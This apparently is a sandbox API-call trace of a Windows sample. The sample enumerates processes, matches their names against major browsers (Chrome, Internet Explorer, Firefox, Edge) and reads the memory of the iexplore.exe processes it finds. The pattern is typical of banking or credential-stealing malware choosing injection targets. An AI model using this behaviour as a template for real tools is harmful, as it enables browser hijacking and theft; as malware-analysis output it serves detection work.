	[0206.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.152] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.153] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.153] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0206.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2e6c
	[0206.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.154] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0206.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.154] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.154] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0206.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.158] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.158] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.159] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2e70
	[0206.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.159] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.160] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.160] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.160] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.160] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0206.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2e74
	[0206.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.161] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0206.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.162] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.162] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0206.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.162] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.163] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0206.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2e78
	[0206.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.163] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0206.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.164] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.164] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0206.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.164] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.164] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0206.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2e7c
	[0206.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.165] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0206.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.165] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.166] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0206.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.166] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.166] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0206.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2e80
	[0206.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.167] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0206.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.167] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.168] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0206.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.168] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.168] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0206.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0206.169] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0206.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2e84
	[0206.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.170] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0206.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.170] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.171] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0206.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.171] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.172] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0206.172] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2e88
	[0206.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.173] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0206.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.173] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.173] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0206.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.173] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.174] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0206.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2e8c
	[0206.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.174] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0206.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.175] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.175] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0206.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.175] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.176] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0206.176] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2e90
	[0206.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.176] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0206.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.177] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.177] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0206.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.177] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.178] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0206.178] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2e94
	[0206.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.178] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0206.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.179] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.179] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0206.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.180] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.180] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0206.181] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2e98
	[0206.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.181] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0206.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.181] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.182] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0206.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.182] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.182] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0206.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2e9c
	[0206.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.183] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0206.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.183] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.184] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0206.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.184] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.184] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0206.185] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2ea0
	[0206.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.185] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0206.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.186] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.186] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0206.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.187] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.187] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0206.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2ea4
	[0206.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.188] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0206.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.188] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.188] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0206.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.189] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.189] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0206.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2ea8
	[0206.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.190] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0206.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.190] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.190] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0206.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.190] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.191] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0206.191] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2eac
	[0206.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.191] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0206.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.192] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.192] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0206.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.193] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.193] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0206.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2eb0
	[0206.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.194] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0206.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.195] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.195] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0206.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.196] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.196] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0206.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2eb4
	[0206.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.197] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0206.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.198] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.198] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0206.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.199] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.199] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0206.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2eb8
	[0206.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.200] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0206.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.201] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.204] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0206.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.205] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.206] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0206.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2ebc
	[0206.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.206] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0206.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.207] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.207] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0206.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.208] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.208] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0206.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2ec0
	[0206.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.209] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0206.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.209] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0206.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.209] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0206.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.210] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.210] NtQueryInformationProcess (in: ProcessHandle=0x2ec0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0206.210] ReadProcessMemory (in: hProcess=0x2ec0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0206.210] ReadProcessMemory (in: hProcess=0x2ec0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0206.210] ReadProcessMemory (in: hProcess=0x2ec0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0206.210] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0206.210] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0206.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2ec4
	[0206.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.211] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0206.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.212] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0206.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.212] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0206.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.212] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
